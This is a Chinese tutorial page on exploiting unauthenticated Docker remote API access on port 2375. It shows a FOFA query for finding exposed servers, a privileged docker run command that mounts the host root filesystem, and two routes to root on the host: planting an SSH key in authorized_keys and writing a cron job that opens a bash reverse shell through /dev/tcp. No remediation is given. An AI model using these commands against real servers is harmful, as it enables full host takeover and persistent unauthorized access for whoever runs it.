Docker API 未授权访问漏洞问题解析
目录
- docker api未授权访问漏洞
- 00x1 漏洞成因
- 00x2 信息收集
- 00x3 漏洞利用
- ssh连接
- 写计划任务
因为docker赋有远程的远程控制,docker开放了一个tcp端口2375,如果没有限制访问的话,攻击者就会通过这个端口来通过docker未授权来获取服务器权限。
docker api未授权访问漏洞
00x1 漏洞成因
因为docker赋有远程的远程控制,docker开放了一个tcp端口2375,如果没有限制访问的话,攻击者就会通过这个端口来通过docker未授权来获取服务器权限。
00x2 信息收集
FOFA中搜索port = 2375 && status_code = "404"
访问站点2375端口,显示

访问/info目录,查看版本信息

证明改站点存在docker未授权访问漏洞
00x3 漏洞利用
docker -H tcp://ip ps -a 查看容器 dokcer -H tcp:// images 查看镜像
为了获取宿主机的权限,我们需要把宿主机的根目录挂载到docker容器中
docker -H tcp://ip run -it --privileged=true -v /:/mnt --entrypoint /bin/bash image-id
--privileged=true:使用该参数,container内的root拥有真正的root权限。
-v /:/mnt:将宿主机的根目录挂载到/mnt目录下
--entrypoint /bin/bash:指定镜像的默认入口命令,该入口命令会在启动容器时作为根命令执行,所有其他传入值作为该命令的参数,用法ENTRYPOINT command param1 param2

现在就拿到了root权限,利用方式有很多种
ssh连接
ssh-keygen -t rsa //生成一个ssh公钥 cat /root/.ssh/id_rsa.pub //查看生成的公钥 echo "公钥内容" > /mnt/root/.ssh/authorized_keys //写公钥 ssh root@目标ip -i id_rsa //ssh进行连接
写计划任务
nc -lvvp port //开启监听 echo "* * * * * /bin/bash -i >& /dev/tcp/ip/port 0>&1" > /mnt/var/spool/cron/root ///反弹shell
您可能感兴趣的文章
- 12-20Kubernetes中使用临时容器进行故障排查的方法
- 12-20Nginx设置HTTPS的方法步骤
- 12-20二进制方式安装 Kubernetes1.18.3版本实现脚本
- 12-20Nginx工作模式及代理配置的使用细节
- 12-20ZooKeeper分布式协调服务设计核心概念及安装配置
- 12-20Kubernetes部署可视化地图的十个步骤
- 12-20关于docker清理Overlay2占用磁盘空间的问题(亲测有效)
- 12-20Docker compose配置文件写法及命令使用示例
- 12-20openwrt安装docker并启动的操作方法
- 12-20云原生Kubernetes初始化容器Init使用教程


阅读排行
推荐教程
- 12-07一文教你怎么选择Tomcat对应的JDK版本
- 12-07新版Eclipse集成Tomcat时找不到server选项的解决方法
- 12-06IIS7 应用程序池自动回收关闭的解决方案
- 12-05Windows Server 2019安装VMware
- 12-05Windows服务器默认IE浏览器无法下载文件的解决方法
- 12-05Docker安装Jenkins全过程
- 12-19Zabbix SAML SSO 登录绕过漏洞的操作流程
- 12-15Docker-Compose搭建Spark集群的实现方法
- 12-14Docker Desktop无法正常启动解决(failed to start...)
- 12-14k8s 与docker空间使用分析与清理方法





